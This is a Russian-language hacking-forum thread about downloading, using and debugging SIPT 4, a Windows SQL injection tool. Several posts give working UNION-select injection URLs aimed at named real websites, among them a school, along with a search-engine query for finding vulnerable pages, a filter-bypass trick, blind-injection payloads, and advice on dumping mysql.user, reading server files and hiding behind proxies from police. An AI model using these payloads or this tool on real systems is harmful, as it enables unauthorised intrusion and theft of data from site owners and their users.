SQL Injection Tool 4 beta.

Качаем, устанавливаем, отписываем.
http://dbattack.com/files/setup.sipt4.rar

Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в урл пишем
http://localhost/test.php?getid=1{SQLINJ}

а если это текстовый параметр то урл будет такой
http://localhost/test.php?getid=1'{SQLINJ}

ну всё остальное похоже, сообственно кто захочет разберётся.


на сайт не смотрите, пока только в стадии задумки :)))

Так вот и долгожданный мануал по проге готов и опубликован в разделе статьи. Но он был под версию 3 , так что не совсем актуально, будет время - обновлю
читать тут (http://forum.antichat.ru/thread40545.html)

И ещё маленькое обновление проги, качать с оф.сайта, указан в первом посте.

Программа может определятся анивирусами такими как например Kaspersky Antivirus 7.0 как HackTool

отчёт об обнаружении: вредоносная программа
HackTool.Win32.SQLInject.i 4 Файл: s-tool.exe

Господа кто подскажет как уладить сложившуюся ситуацию отпишите, обращения в Поддержку ни чего не дало.

обновил первый пост , читаем , качаем, версия 4 наконец то появилась в паблике, для всеобщего юзанья.


Следующие намеченые обновления:
1. Поддержка HTTP PROXY
2. Benchmark как способ посимвольного брута
3. More1row как способ посимвольного брута
4. Настройка большинства функций для работы в слепом режиме с помощью Benchmark и More1row(изврат конечно, но мало ли кому понадобится).
5. Автоматическая проверка работы через POST, если даже инъекцию вы нашли в GET параметре. Ну например если в скрипте юзается не GET и POST , а например REQUEST

А ничо так программа! Автору респект! за 3 секунды инъекцию раскрутила))

Из плюсов интерфейс стал более понятный.
Прошлая програма мне не очень то и нравилась. т.к разобраться не смог - а это крутая)

А ничо так программа! Автору респект! за 3 секунды инъекцию раскрутила))

Из плюсов интерфейс стал более понятный.
Прошлая програма мне не очень то и нравилась. т.к разобраться не смог - а это крутая)


Полностью согласен!


Автор - зачёт

Хотелось бы русскую версию!

Хорошо бы было сделать так, что про сохранение логов не спрашивала, поставил таблы брутить и пошёл гулять\чай пить или галочкой отмечать.
P.s.: Может не догнал где эта функция.)

Где я могу получить этот инструмент? (by translator) :)

Где я могу получить этот инструмент? (by translator) :)
dl it here
http://dbattack.com/files/setup.sipt4.rar

I know that link but don't work for me...I can't download nothing.

Хорошо бы было сделать так, что про сохранение логов не спрашивала, поставил таблы брутить и пошёл гулять\чай пить или галочкой отмечать.
P.s.: Может не догнал где эта функция.)

галочка в programm settings -> auto clear system log и programm settings -> disable sysem log

Link works. try to use proxy or socks

I can't also this way...u can upload it pls. on some other server...maybe rapidshare?

thx ;)


Edit:

everything's fine now... downloaded with IE Browser... I can't with Firefox or Opera.

anyway great job, keep it up and try if u can to do also some tut. in english ;)

не ставится галочка Use proxy (( соответственно поля не активны

Хорошо, конечно, что прога дорабатывается, но теперь, к сожалению, приходится пользоваться обеими версиями сразу, а еще и в ручную, вот почему:

1) Переделан DataBrutForce(а он помогал извлекать данные без брута(зная таблицу и поля) с помощью лимита,
2) Убран кодировщик - помогал просматривать диру в браузере(на определенной версии *nix - кто знает, тот поймет),
3) Ожидал, что будет добавлена проверка на возможность доступа к mysql.user и чтение файлов, но она очень криво реализована(через Get Names From Information_schema), а хотелось бы видеть кнопку типа Check access to mysql.user & file_priv current user,
4) Хотелось бы видеть поддержку соксов,
5) В предыдущей версии Order By работала и без определения строки,
6) Практически не работает(по крайней мере у меня) детектор типа базы данных,
7) Хотелось бы, чтобы реализация самого запроса была пересмотрена в сторону CONCAT_WS(можно ввиде галочки) для сокращения самого запроса,
8) При выходе из проги не сохраняется последный урл...

А так - прога просто незаменима, особенно порадовало в новой версии реализация проверки GET-POST и хороший посимвольный брут...

РЕСПЕКТ АВТОРУ!

Хорошо, конечно, что прога дорабатывается, но теперь, к сожалению, приходится пользоваться обеими версиями сразу, а еще и в ручную, вот почему:

1) Переделан DataBrutForce(а он помогал извлекать данные без брута(зная таблицу и поля) с помощью лимита,
2) Убран кодировщик - помогал просматривать диру в браузере(на определенной версии *nix - кто знает, тот поймет),
3) Ожидал, что будет добавлена проверка на возможность доступа к mysql.user и чтение файлов, но она очень криво реализована(через Get Names From Information_schema), а хотелось бы видеть кнопку типа Check access to mysql.user & file_priv current user,
4) Хотелось бы видеть поддержку соксов,
5) В предыдущей версии Order By работала и без определения строки,
6) Практически не работает(по крайней мере у меня) детектор типа базы данных,
7) Хотелось бы, чтобы реализация самого запроса была пересмотрена в сторону CONCAT_WS(можно ввиде галочки) для сокращения самого запроса,
8) При выходе из проги не сохраняется последный урл...

А так - прога просто незаменима, особенно порадовало в новой версии реализация проверки GET-POST и хороший посимвольный брут...

РЕСПЕКТ АВТОРУ!

Отвечаю
1.Добавлено, просто пока скрыто.
2.Все протестено, просмотр, стал ещё более удобен, там встроен файл менеджер, через SQL, если есть File_Priv то можно просматривать файлы, а если удалённая система это FREEBSD то и каталоги, всё это есть, для просмотра используйте File Path и Dir Path и соответствующие кнопки.
3.Сообственно ни чё кривого нет, просто выбираете, MySQL.user или MySQL.All и тыкаете кнопку Fill. далее выбираете нужные столбцы и тыкаете GET DATA. Если есть доступ к системным таблицам MYSQL , то всё увидете.
4.Будет в следующем релизе.
5.Что то не верится, ибо там проверка та же самая стоит, я только усовершенствовал. Хуже работать не может впринципе.
6.Он вообще не работает, ибо в проге есть функции только для MYSQL.
7. Не будет , ибо так удобнее и програмировать и парсить.
8.Сохрание настроек пока не предусмотрено, в целях вашей же безопастности, но может и сделаю, если очень надо.

1.Добавлено, просто пока скрыто.
Приват?
3.Сообственно ни чё кривого нет, просто выбираете, MySQL.user или MySQL.All и тыкаете кнопку Fill. далее выбираете нужные столбцы и тыкаете GET DATA. Если есть доступ к системным таблицам MYSQL , то всё увидете.
А если доступа к mysql нет, а file_priv есть? Не проще ли сразу обо всем сказать[например, добавить пунктами к user(), version(), database()]?
5.Что то не верится, ибо там проверка та же самая стоит, я только усовершенствовал. Хуже работать не может впринципе.
Сейчас даже и не пытается, пока не впишешь Key...
6.Он вообще не работает, ибо в проге есть функции только для MYSQL.
А зачем он тогда? Или другие базы приват? Ведь перебор, например, MSSQL легко организовать через подзапросы...

Русскую версию в студию.

Русскую версию в студию.
не будет

не будет
жаль...но за проект спасибо:)
долго мучился?
Люблю я таких людей как ты, - терпеливых и целеустремленных:)(нет я не подлизывался!)

Выражаю уважение таким людям, мало того что проделан немалый труд,так ещё и free.Огромное мегаспасибо, тулза на высоте.По сравнению с третьей версией особо порадовала.Небо и земля.
Когда планируется включить поддержку проксей и всех указанных обновлений? Жду недождусь, не я один :)
Ещё раз спасибо.

знаете, я реально за все 2 года что тут торчу ... ну 3ий почти ... понял откуда ноги растут у скулей :|
пасибо тебе скульхак за тулзу!ты реально открыл мне глаз (:

Блин,а я не могу скачать,у меня какиэто иероглифи показует когда нажимаю на ссилку.
Дайте нормальную.

Скачай download'er любой и добавь в закачки.

Ну найденные мной критические ошибки.

1) Не сохраняет текущую сессию и если вылетает надо вбивать и искать все заново.
2) Нельзя сохранить сканирование как задачу. (Тоесть сделать определенные действий сохранить, выйти, запустить загрузить продолжить)
3) Не сохраняються пути до словарей если они не лежат в директории с программой.
4) При работающим сканировании попытка изменить какие либо настройки (например добавить или изменить лист вылетает алерт далее вылетает сама прога, мативировав это тем что не может писать в используемый файл, и тут уже первый пункт)

Из маленьких недочетов.
1) Очень раздражает когда спрашивает сохранить отчет в файл или нет, тоесть нельзя поставить сливаться структуру и пойти пить чай, надо постоянно тыкать.

В целом большой респект, прога порадовала.
Не сочти данные ошибки как претензии наоборот =)
Если что ася та же.
Спасибо.

такс, не понравилось следующее:
Открыл прогу, проверил одну скули(с загруженными словарями таблиц и колонок), закрыл. Открываю опять, проверяю другую скулю(все галочки с имен таблиц убрал, добавил свое имя таблицы), прога начала проверять все! имена таблиц из словаря, даже на которых не стояли галочки.. =/

надо нажать на "сохранить словарь".

2 [cash]
1) Не сохраняет текущую сессию и если вылетает надо вбивать и искать все заново.
2) Нельзя сохранить сканирование как задачу. (Тоесть сделать определенные действий сохранить, выйти, запустить загрузить продолжить)
3) Не сохраняються пути до словарей если они не лежат в директории с программой.

Сохрание параметров пока в проге не активировано мною, но практически дописано, по этому пока ничё и не сохраняется.

4) При работающим сканировании попытка изменить какие либо настройки (например добавить или изменить лист вылетает алерт далее вылетает сама прога, мативировав это тем что не может писать в используемый файл, и тут уже первый пункт)

да, такая штука, есть, пока не нашёл вариантов как сделать изменения на лету , скорее всего просто залочу некоторые контролы в процессе сканирования.

Из маленьких недочетов.
1) Очень раздражает когда спрашивает сохранить отчет в файл или нет, тоесть нельзя поставить сливаться структуру и пойти пить чай, надо постоянно тыкать.

Есть галочка в настройках, авто очищение, и совсем отключение лога.

все таки было бы супер если можно было сохранять скули в какие то файлы. и загружать их потом потаму что вводить по несколько раз очень раздражает.

Так же не как не могу сохранить путь до словарей.

нужно потсавить табуляцию для таблиц относящихся к определенной table_schema (при сохранинеии в файл дампа INFORMATION_SCHEMA)

прога отличная.
вот только один минус
---------------------------------------------
| Names from Information_schema |
---------------------------------------------
поля from [999] и To [999]
В этим поля можно записать мах значение 999, а иногда нужно больше.

Анлогично и с Get data from tables.

']все таки было бы супер если можно было сохранять скули в какие то файлы. и загружать их потом потаму что вводить по несколько раз очень раздражает.

Так же не как не могу сохранить путь до словарей.

да я же сказал всё уже почти сделано, настройки проги можно будет сохранить в произвольный файл, хоть сплойты пиши


---------------------------------------------
| Names from Information_schema |
---------------------------------------------
поля from [999] и To [999]
В этим поля можно записать мах значение 999, а иногда нужно больше.

Анлогично и с Get data from tables.

сделано, сорри не сразу понял про что вы...

SQLHACK скачал с первой страницы sip4, но поля такие же остались. длина поля осталась прежней, можно вести максимальное число в 3 цифры [999]. хотелось бы чтоб можно было вводить до 100к. а то приходится дампить большие базы.

сделано, сорри не сразу понял про что вы...
Хотелось бы знать где исправленая версия? с более большими полями :)

']
Хотелось бы знать где исправленая версия? с более большими полями :)
а ты думаешь , я после каждого багфикса выкладывать буду, я щас написал несколько новых вещей, добавил кнопочек и всяких настроек , кое чего исправил, что то дополнил, вот как все изменения отлажу, так и выложу. думаю 1-2 недели понадобится, может меньше, зависит от свободного времени.

Бойтесь своих желаний. Они могут исполниться.... соль
жду апдейта.

Добавь # в Close SQL . потому что в mysql 5 . /* требует закрытия

Хочется чего нить консольного и кроссплатформенного)

Добавь # в Close SQL . потому что в mysql 5 . /* требует закрытия

А %23 это по вашему не знак решётки (#) ?
Смотрите внимательней!

Добавь # в Close SQL .
# в чистом виде не примимаеться в url строке.

кеш почуял тему...

Хотелось бы увидеть в проге Обход на фильтрацию UNION и SELECT.
Вроде того:
UnIoN+SeLeCt

']Хотелось бы увидеть в проге Обход на фильтрацию UNION и SELECT.
Вроде того:
UnIoN+SeLeCt
это разве обход :) ?
Например ununionion - обход :)

Теперь все обсуждения моей проги SIPT тут.
http://dbattack.com/

Добавлен мануал к 4 версии проги, брут пока не описан т.к. не дописана прога

А будет ли версия под nix ? желательно с интерфейсом под gnom ?)

когда релиз багфиксов? или новой версии?

сегодня


Выложена новая версия.
Скачиваем, работаем ...:)

А будет ли версия под nix ? желательно с интерфейсом под gnom ?)
нет. VB под никсы нет ))))

нет. Vb под никсы нет ))))
А кто сказал что под никс есть Vb ?=)
Перепиши на си =)

если обновленная версия в первом топике, то где обновление связаное с кол-вом таблиц? как и раньше не более 999 ((

если обновленная версия в первом топике, то где обновление связаное с кол-вом таблиц? как и раньше не более 999 ((

а что мешает самому добавить?!

Картиночки-то там любые можно ;) ...
З.Ы.: +Тоха+ очень суровый человек, т.к. я сейчас очень тоже суровый.

Когда указываю дополнительные заголовки: Cookie: PHPSESSID=блаблабла, то вместо указанным мной данных нагло посылает другие куки, из чего делаю вывод что соединяется с сайтом программа раньше чем я даю ей команду :\

некачает... :( дайте другую ссылку

Ребят, че тормозите? Автор же в начале написал что идем сюда: http://dbattack.com/forum/index.php

перезалейте SQL Injection Tool 4 и мануал please, сайт автора в дауне...

Держи SIPT 4 (http://pashkela.narod.ru/progi/sipt4.rar)

а не найдутся добрые люди,которые напишут мануал по этой программе (желательно с картинками).думаю многим поможет

http://forum.antichat.ru/thread40545.html А это чем тебе не мануал ?!

SQL Injection Tool 4 (http://www.uploading.com/files/A0TV8RJJ/sipt4.rar.html )

Перезалил - отсюда быстрей будет качать - а то с народа качает 20 минут !

У многих людей возникает вопрос(даже после прочтения мануала к проге), как все-таки юзать эту прогу...
я за 5 минут наваял комикс "Как начать работу с программой", надеюсь кому-нибудь он поможет...
Допустим мы нашли инъекцию:
http://www.bpeg.ca/code/news/nw/article.php?id=-111+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13--
теперь смотрим мануал, там все на пальцах расписано, что и как скармливать SIPT`у, чтобы он начал работу с инъекцией...

Открыть мануал (http://i003.radikal.ru/0901/fc/f123b8a19893.jpg)

Не пашет брут путей почему-то в SIPTe.Задал путь к текстовому файлегу с путями в виде ../../../../conf/httpd.conf из темы путей по умолчанию к конфигам и базам.Жму "Brute Paths" и молчание в ответ =_=. У кого-нибудь работает ?

А у меня траблы с настройкой прокса у этой проги. Короче настройки прокси заблокированы и поставить галочку в чекбоксе "Use Proxy" не дает, как в прочем и использовать Netcat. Использую версию с диска к журналу Хакер за август 2008 года, ибо те версии, которые можно скачать по ссылкам данной темы форума, такую возможность напрочь не имеют, чего собственно и ждут наши братья из управления К. А dbattack уже много дней не доступен.

2 Велемир
У меня тоже не работает...
вот написал скрипт для брута, может пригодится...
http://forum.antichat.ru/showpost.php?p=1088353&postcount=615

2 Rubick
А это специально так задумано, чтобы кто попало под проксями сайты не хекал, ты возьми ресурс едитор какой-нибудь и исправь это дело... А если серъезно, то да, не пашет ((...

версия 5 в разработке, версия 4 - поддержка оффициально приостановлена

IceAngel_
А это специально так задумано, чтобы кто попало под проксями сайты не хекал, ты возьми ресурс едитор какой-нибудь и исправь это дело... А если серъезно, то да, не пашет ((...

Если бы он включался LordPE или PETools ами я бы сюда не писал. Я честно его отдекомпилил, посмотрел код, там ведь все необходимое присутствует. Я про процедуры: 1.57 ChkProxy.Click();
1.59 TxtProxyPort.Change() ну и т.д. А вот активировать Бокс Proxy Settings мне не судьба. Я на стока в риверсе не шарю.
А за то что 5-ая скоро появится и надеюсь в ней все будет оргомный Автору РЕСПЕКТИЩЕ. Буду ждать с нетерпением. Только вот как я говорил и ранее и повторюсь еще дбаттак валяется. Зайти на него нельзя.

помогите пожалуйста, как сделать, что бы прога после комментария -- ставила пробел + (именно плюсиком)

2pinky07
http://localhost/test.php?getid=1{SQLINJ}+

2pinky07
Щас получается -- +, а надо что бы было --+
З.ы. Все догнал, я просто убрал в настройках комментарии и сам дописал +--+

дайте валидную ссылку на эту прогу

_http://stream.ifolder.ru/6730914
вот нашел.. если кто может, перезалейте на рапиду хотя бы.

rapidshare http://rapidshare.com/files/195062572/setup.sipt4.txt
letitbit http://letitbit.net/download/597e13284644/setup.sipt4.txt.html
depositfiles http://depositfiles.com/files/aslijvvpt

Обращаюсь к разработчику: Мне,как фанату,очень интересно,что будет включено в новую версию(если я ничего не пропустил,хотя перечитывал тему не одинь раз) программы и когда она примерно выйдет?:)ИЗ пожеланий хотелось бы увидеть дампер содержимого таблиц и полей в новой версии.Было бы очень замечательно... Также я заметил,что прога некорректно обрабатывает данные(не знаю,почему),когда на сайте очень много различных цифр(не спрашивайте,что за кретин их там написал))) ).Brute Paths,к величайшему сожалению из сожалений,не работает...А также косяки с прокси.Лично меня всё остальное устраивает,а недавно я даже заметил,как системные логи отключать)))))))))))))).Аналогов у SIPTа НЕТ...И слава Богу,что больше не придётся писать подобных прог другим )))

Дампер содержимого там есть , и таблиц и полей и всего остального.
Данные могут некорректно обрабатываться когда на сайте более 65536 слов исключая теги.да на это есть косяк MS, тут я не властен.
Brute Paths к моему величайшему оху.....ию реально работает, не знаю как там у вас, но FILE_PRIV должен быть YES.
Ну а с прокси я не знаю какие у вас косяки, но насколько я помню, то в 4 версии проги вообще нет упоминая про прокси, где вы их нашли блин, МИСТИКА )))

2 SQLHACK
то в 4 версии проги вообще нет упоминая про прокси, где вы их нашли блин, МИСТИКА )))
не буду голословным...
http://s51.radikal.ru/i134/0902/bf/f2ad9e111a70.jpg (http://www.radikal.ru)
WTF???

ну этот скрин не с последней версии, сорри , последняя версия выглядит иначе.

обьясните нубу, скачал тхт файл, проги самой не вижу, че нада делать?

В .rar переименуй!

ну этот скрин не с последней версии, сорри , последняя версия выглядит иначе.


выложи, пожалуйста, ссылку на последнюю версию


у тебя в подписи - "Сайт о SQL Injection Tool 4" - http://dbattack.com/ - он не работает.


!!! СПАСИБО! за очень полезную и нужную софтину!

с нетерпением ожидаем новой версии

Эээ... или я идиот,или где там дампер содержимого таблиц,полей и всего остального ?)))

Эээ... или я идиот,или где там дампер содержимого таблиц,полей и всего остального ?)))
http://pic.ipicture.ru/uploads/090312/50lBAcHRq4.jpg (http://ipicture.ru/)

а сайт лежит? или у меня нсы тупят?

перезалейте плиз у кого есть

здесь в теме лежали сцелочки, первые две точно робют, дале не проверял
http://pashkela.narod.ru/progi/sipt4.rar
http://www.uploading.com/files/A0TV8RJJ/sipt4.rar.html
rapidshare http://rapidshare.com/files/195062572/setup.sipt4.txt
letitbit http://letitbit.net/download/597e13284644/setup.sipt4.txt.html
depositfiles http://depositfiles.com/files/aslijvvpt

автору
дописал бы чтоб дата лог сохранялся сам например после добавления новой записи а то прога иногда вылетает с ошибкой...)

а поставить галку "Disable system log" не судьба ?

скуль ты куда пропал? огромная просьба, добавь поддержку проксиков! а нто приходиться ds покупать /:

+ заметил такую багу :
когда ставишь от 0 до 9999, вылетает с критом
http://clip2net.com/clip/m10530/thumb640/1238088262-clip-9kb.png (http://clip2net.com/page/m10530/771970)
то есть, если в таблице больше 9999 ровзав, выкидывает. :confused:

Несколько вопросов и предложений:

1) Где анонсируются обновления данного продукта ?
2) Как скачать его и будет ли дальнейшее его развитие ?
3) Хорошо бы сделать перебор по лимиту из information_schema побольше(50 или 100к),а то иногда базы бывают оч большие,и приходится писать скрипты для дампа...Медленно.но работает:).

ЗЫ: Почему-то не работает у меня Брут путей:( У кого работает,простьа отписать сюда свои аськи(если хотите конечно),и я с вами свяжусь.Или же помочь мне как-то,ну:(:(:(.

А так,автору респект(ещё один? :):) )
Если что найду,то сразу же отпишусь )

бля на файлбим закиньте некачаеться

а чё с сайтом? там редирект на какой-то левак :(

пыщьь (http://pashkela.narod.ru/progi/sipt4.rar) . Если у кого есть, поделитесь 3-й версией.

третья версия (http://slil.ru/27458030)

огромный респект за прогу, улчше третьей версии и панголина в тыщи раз)) на данный момент самая крутая прога для работу с мускулями =)

Беда в следующем. Пробую разные сайты подверженные SQL INJ вручную таблицы и колонки из Information_Schema выдёргиваются нормально. С помощью SIPT нормально получается выводить версию БД итд... НО удаётся получить только таблицу COLLATIONS. В чём проблема?

http://img194.imageshack.us/img194/7702/problemanv.th.jpg (http://img194.imageshack.us/my.php?image=problemanv.jpg)

может просто не быть прав на чтение, или пустые все остальные, что врядли. Вообще SIPT4 - ахрененная штука, но только после детального анализа РУЧКАМИ.

Плюс у тебя не стоит галочка напротив Encoding AES - очень может быть в этом всё дело. Или РУЧКАМИ в браузере попробуй unhex(hex(ДАННЫЕ))

Да, SIPT4 - это чудо, но чудо автоматизации, а что-либо автоматизировать можно только когда знаешь весь процесс от и до.

может быть что просто БД разные))))не обязательно что стоит тока infor.... могут быть и другие)))

вручную таблицы и колонки из Information_Schema выдёргиваются нормально

галка Encoding AES не помогла

Рассмотрим на живом примере теперь.

http://www.tauntonschool.co.uk/foundation/index.php?id=-539'+union+select+1,2,GROUP_CONCAT(table_name),4+f rom+information_schema.tables+--+

Видим таблицы:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,USER_PRIVILEGES,VIEWS,courier_news_files,cour ier_news_schools,events,events_images,file_categor ies,file_categories_dev,............

Теперь скормим программе:

http://img188.imageshack.us/img188/8829/61381266j.th.jpg (http://img188.imageshack.us/my.php?image=61381266j.jpg)

Опять нашёл только одну таблицу. WTF??

Проблему нашёл:
SIPT делает два запроса:

Превый:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+

Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).

Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+ 2,1--+

Который само собой ничего не выводит.

Второй запрос должен быть таким:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+


Это у меня сборка такая косячная или я чего то не догоняю???

_____________________________


И наконец то нашёл косяк в том что стоит галка AddLimit.


То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.

Проблему нашёл:
SIPT делает два запроса:
Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.

Который само собой ничего не выводит.


Да это косяк сборки, я признаюсь косякнул, но перекомпилить не могу.
Чтобы обойти этот баг, надо просто к запросу добавить limit 0 в строке УРЛ и снять галку add limit

чтобы исходный запрос получился типа этого
SELECT * FROM users WHERE id=567 limit 0 union select 1,2,3...
например

.php?id=567+limit+0{SQLINJ}
тогда все будет прекрасно работать ибо это одно и тоже.

спасибо. тулза очень удобнаю. приноровился к её особенностям так сказать. юзаю...

Когда ищу колонки, в строек пишу так:
news.php?newsid=1+AND+1=1{SQLINJ}

Когда ищу таблицы и дамплю, просто делаю равенство неверным:

news.php?newsid=1+AND+1=2{SQLINJ}

Прога замечательная.Я заточил её под постгре и оракл)).Пара пожеланий:

1.Увеличить диапазоны перебираемых таблиц и полей из базы.После 30к записей вылетает с ошибкой.
2.Добавить комментарий --,а то каждый раз приписывать плюсики напрягает)))
3.Очень хотелось бы видеть поддержку для OracleSql,PostgreSql MsSql.Проходит ли работа в данном направлении. ?
4.Поддержка авторизации,ибо sql inj может быть недоступна при отсутствии авторизационных данных.Если такое уже сделали,то просветите,пожалуйста.(Ожи� �алось что-нибудь вроде полей username/password).


Автору,конечно же,пожелаю здоровья и тратить побольше времени для любимого сипти))).Если что найду - сразу же отпишусь.

при sql-переборе post-методом, если нужно подставить дополнительные данные(а именно кукисы), то программа подставляет их неправильно, т.е. перед этими данными не ставится перенос строки, "\r\n", и весь запрос в пи*ду.

Перезалейте кто нить, ссылка битая уже

Перезалейте кто нить, ссылка битая уже

__http://rapidshare.com/files/251409152/sipt4.rar.html


вот залил..

Перезалейте пжл. Не качает.

http://depositfiles.com/files/60z5iznfr
http://ifolder.ru/12972726
http://www.rapidshare.ru/1091583
http://up-file.com/download/3124988aaddf01c5d297323012290458e
http://www.megaupload.com/?d=IYSP4AQ7
http://letitbit.net/download/1496.1253db6e726ba0fa7b35433f9/sipt4.rar.html

dl it here
http://dbattack.com/files/setup.sipt4.rar
имеется прога и уязвимость выданная сканером что дальше не как не могу понять куда и что вставлять :confused:

На всякий случай, так мой сайт на народе похерили, SIPT4:

скачать (http://bug-track.ru/prog/sipt4.rar)

ЗЫЖ Чисто из уважения к автору и к самой проге, аналогов нет только потому, что это адский труд, попытаться даже предусмтотреть более-менее все возможные варианты настолько качественно. Планету хакерам!

чо за?
http://img16.imageshack.us/img16/6804/73747677.png

чето не так с твоей виндой, или XPSP3 или какая другая, я не тестил, только в XP SP 2 тестировалась

да сп третья, это чревато неработоспособностью программы?

нормально на SP3 работает...

кинь инстал свой, а не те что на разных сайтах я качал, мб и получится :( но чот сомневаюсь, штук 6 разных скачал и ни как
или подкиньте третью версию

Автор, а что там с 5-ой версией?

SQL Injection Tool 4 beta.

Качаем, устанавливаем, отписываем.
http://dbattack.com/files/setup.sipt4.rar

Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в урл пишем
http://localhost/test.php?getid=1{SQLINJ}

а если это текстовый параметр то урл будет такой
http://localhost/test.php?getid=1'{SQLINJ}

ну всё остальное похоже, сообственно кто захочет разберётся.


на сайт не смотрите, пока только в стадии задумки :)))
Чёт не качает можешь перезалить?

Анонсироваться буит или зависло всё ?

собственно пятая версия затухла всвязи с забиванием всех кодеров которые хоть как то умеют кодить на qt

ЕСЛИ КТО ТО УМЕЕТ РЕАЛЬНО КОДИТЬ, ИМЕЕТ ВРЕМЯ НА ЭТО И ГЛАВНОЕ ХОЧЕТ ДОДЕЛАТЬ ПРОГУ -> МОЖЕТ ОБРАЩАТСЯ КО МНЕ В АСЮ

да перезалей, может пригодится )

перезалей

http://depositfiles.com/files/zz33ew0rp

Я вот долго искал и не нашёл как запустить SIPT 4 через прокси...
Может подскажите?

Я вот долго искал и не нашёл как запустить SIPT 4 через прокси...
Может подскажите?

Есть софт который пускает весь трафф через прокси...

Читать ТУТ: https://forum.antichat.ru/thread59478-proxy.html

Как использовать прогу для инъекций через POST,ненадо скидывать ссылку на мануал-ибо там про пост написано 2 предложения в которых нет норм объяснения

Отличная шняга, особенно для 5.х.
Для четвертой версии приходиться перебирать таблицы с помощью программы.

inurl:"news.php?id=" "You have an error in your SQL syntax" -- Запрос для гугля.
Далее по накатанной :
+union+select+null,null,null+from+table1/*

http://who-cs.ru/img/images/obyybdgp81x518t9ppkb_thumb.jpg (http://who-cs.ru/img/viewer.php?file=obyybdgp81x518t9ppkb.jpg)
http://who-cs.ru/img/images/bfxv27ajp4j36q74rhu_thumb.jpg (http://who-cs.ru/img/viewer.php?file=bfxv27ajp4j36q74rhu.jpg)
http://who-cs.ru/img/images/wqf1d3wl4vmjl2fsg36i_thumb.jpg (http://who-cs.ru/img/viewer.php?file=wqf1d3wl4vmjl2fsg36i.jpg)
http://depositfiles.com/files/v8avnanot

Проблемка при проведении слепой инъекции-Key определился,все норм,но когда жму Get result,то постоянно говорит что 1 и последующие символы =37
printerfriendlynews.php?newsid=164831+AND+ASCII(SU BSTRING((user(),1,1),1,1))=37--
printerfriendlynews.php?newsid=164831+AND+ASCII(SU BSTRING((user(),2,1),1,1))=37--

почему вылетает ошибка когда я нажимаю проверить

Run-time error '35756':

Unable to complete request и потом вылетает

почему вылетает ошибка когда я нажимаю проверить

Run-time error '35756':

Unable to complete request и потом вылетает
Смени Request Type на GET
и Injection Type на URL

возможно что то блочит доступ к инету. вообще такое редко бывает , но бывает, обычно от того что инета нет , хотя там стоит проверка,

Проблема решена путем : деинсталяции (не просто удаление кнопочкой DELETE, а через установку/удаление программ)

Причина как я понял была в том что при установки просит заменить какие то библиотеки в windows папке(вроде в Windiws точно не помню) :) не рискнул - нажал нет, вот и косячило, а потом когда заново устанавливал, нажал да :) теперь пашет

как скачать то отсюда? ttp://dbattack.com/files/setup.sipt4.rar

как скачать то отсюда? ttp://dbattack.com/files/setup.sipt4.rar
никак, домен отвязан от старого хоста

кто поделится третьей версией???

http://slil.ru/28154663

Отличная шняга, особенно для 5.х.
Для четвертой версии приходиться перебирать таблицы с помощью программы.

inurl:"news.php?id=" "You have an error in your SQL syntax" -- Запрос для гугля.
Далее по накатанной :
+union+select+null,null,null+from+table1/*

http://who-cs.ru/img/images/obyybdgp81x518t9ppkb_thumb.jpg (http://who-cs.ru/img/viewer.php?file=obyybdgp81x518t9ppkb.jpg)
http://who-cs.ru/img/images/bfxv27ajp4j36q74rhu_thumb.jpg (http://who-cs.ru/img/viewer.php?file=bfxv27ajp4j36q74rhu.jpg)
http://who-cs.ru/img/images/wqf1d3wl4vmjl2fsg36i_thumb.jpg (http://who-cs.ru/img/viewer.php?file=wqf1d3wl4vmjl2fsg36i.jpg)
http://depositfiles.com/files/v8avnanot
ты тут про sqliHelper 2.7???
Да если на дб лимит прав на юзера типа:
Access denied for user 'блаблабла'@'localhost'
только sipt4 может обойти имей ввиду, а с 5ой версии взят с information_schema.tables/columns я и ручками могу.
Так что sipt4 рулит

http://pic.ipicture.ru/uploads/090312/50lBAcHRq4.jpg (http://ipicture.ru/)
где ты взял эту версию вед 4ая версия не поддерживает проксю и интерфейс тоже немного другой! Может кто нит зальет эту версию?

Сегодня заметил,что SIPT 4 может искать даже без указания ключа поиска(в случае UNION-а).Маленькое открытие для себя...)

SIPT уже вошел в историю хакинга так или иначе. Творцу за огроменный труд - огроменный риспект. Но устарело, к сожалению. Нужно развитие.

это я много раз так ищу когда лень, просто оставлю путыс и выбираю not found

del

Самое прикольное в этой проге то, что она написана на Visual Basic 6 :D

а в чем проблема то ?
ну вот пятая на QT пишется

а в чем проблема то ?
ну вот пятая на QT пишется
qt 4: Программирование GUI на С++ Изд. 2-е
http://www.onlinedisk.ru/file/257087/
